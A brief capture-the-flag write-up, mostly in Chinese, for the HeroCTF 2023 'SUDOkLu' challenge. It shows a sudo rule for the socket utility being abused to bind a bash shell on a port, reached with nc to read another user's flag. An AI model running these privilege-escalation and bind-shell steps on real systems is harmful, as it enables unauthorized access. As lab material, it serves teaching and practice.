2023 | HeroCTF | System
SUDOkLu
题目¶
This is a warmup to get you going. Your task is to read /home/privilegeduser/flag.txt. For our new commers, the title might steer you in the right direction ;). Good luck!
Credentials: user:password123
解题思路¶
-
查看能够使用
sudo执行的命令$ sudo -l Matching Defaults entries for user on sudoklu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User user may run the following commands on sudoklu: (privilegeduser) NOPASSWD: /usr/bin/socket -
开启监听
$ socket Usage: socket [-bclqrvw] [-B local ip] [-p prog] {{-s|host} port | [-s] /path} $ sudo -u privilegeduser socket -v -p bash -s 8081 inet: listening on port 8081 -
另起一个终端连接
$ nc localhost 8081 whoami privilegeduser cat ~/flag.txt Hero{ch3ck_f0r_m1sc0nf1gur4t1on5}
参考资料¶
最后更新:
2023年5月15日 21:36:27
Contributors: